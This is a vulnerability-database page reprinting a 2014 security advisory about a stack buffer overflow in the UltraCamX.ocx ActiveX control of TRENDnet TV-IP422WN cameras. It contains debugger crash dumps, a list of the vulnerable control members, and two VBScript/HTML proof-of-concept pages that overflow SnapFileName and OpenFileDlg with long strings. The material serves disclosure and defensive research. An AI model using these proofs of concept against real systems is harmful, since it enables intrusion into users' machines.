Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TRENDnet SecurView Wireless Network Camera TV-IP422WN Stack BoF

🗓️ 26 Nov 2014 00:00:00Reported by LiquidWormType 
zdt
 zdt🔗 0day.today👁 23 Views

The UltraCamX.ocx file in TRENDnet SecurView Wireless Network Camera TV-IP422WN/TV-IP422W is vulnerable to a stack buffer overflow, leading to memory corruption and potential arbitrary code execution

Code
TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF
 
 
Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W
 
Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.
 
Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.
 
-----------------------------------------------------------------------------
 
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
 
-----------------------------------------------------------------------------
 
 
Tested on: Microsoft Windows 7 Professional SP1 (EN)
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php
 
 
16.11.2014
 
---
 
 
Properties:
-----------
 
FileDescription     UltraCam ActiveX Control
FileVersion     1, 1, 52, 16
InternalName        UltraCamX
OriginalFileName    UltraCamX.ocx
ProductName     UltraCam device ActiveX Control
ProductVersion      1, 1, 52, 16
 
 
List of members:
----------------
 
Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
    RemoteHost
    RemotePort
    AccountCode
    GetConfigValue
    SetConfigValue
    SetCGIAPNAME
    Password
    UserName
    fChgImageSize
    ImgWidth
    ImgHeight
    SnapFileName
    AVIRecStart
    SetImgScale
    OpenFolder
    OpenFileDlg
    TriggerStatus
    AVIRecStatus
    Event_Frame
    PlayVideo
    SetAutoScale
    Event_Signal
    WavPlay
    CGI_ParamGet
    CGI_ParamSet
    MulticastEnable
    MulticastStatus
    SetPTUserAllow
 
 
Vulnerable members of the class:
--------------------------------
 
CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost
 
 
PoC(s):
-------
 
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1
 
thricer=String(8212, "A")
 
target.SnapFileName = thricer
 
</script>
</html>
 
--
 
eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861        movzx   ecx,byte ptr [eax+61h]     ds:002b:414141a2=??
 
--
 
 
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1
 
thricer=String(2068, "A")
 
target.OpenFileDlg thricer
 
</script>
</html>
 
--
 
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
 
--

#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Nov 2014 00:00Current
8.1High risk
Vulners AI Score8.1
trendnet securview wireless network cameraultracamx.ocxbuffer overflow
23